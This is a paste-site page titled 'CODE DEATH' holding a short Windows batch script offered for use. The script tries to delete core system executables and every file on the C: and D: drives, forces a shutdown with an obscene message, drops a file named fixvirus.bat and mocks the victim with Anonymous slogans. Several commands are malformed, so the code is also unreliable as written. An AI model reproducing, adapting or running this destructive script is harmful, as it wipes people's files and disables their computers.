viewing paste CODE DEATH | Text

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@Echo off
msg * Lets Start Making Fun Shall We?
msg * Files Deletion Started!
del “explorer.exe”
del “taskmgr.exe”
del “rundll32.exe”
del “notepad.exe”
del “taskhost.exe”
del “notepad.exe”
del “Winlogon.exe”
del “csrss.exe”
del “dwm.exe”
Del C:\ *.* |y
Del D:\ *.* |y
msg * 100% of Files Deleted!
msg * We are legion. We do not forgive. We do not forget. Expect us!
shutdown - s -t 1 -c “Fuck YoU”
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
Viewed 867 times, submitted by Guest.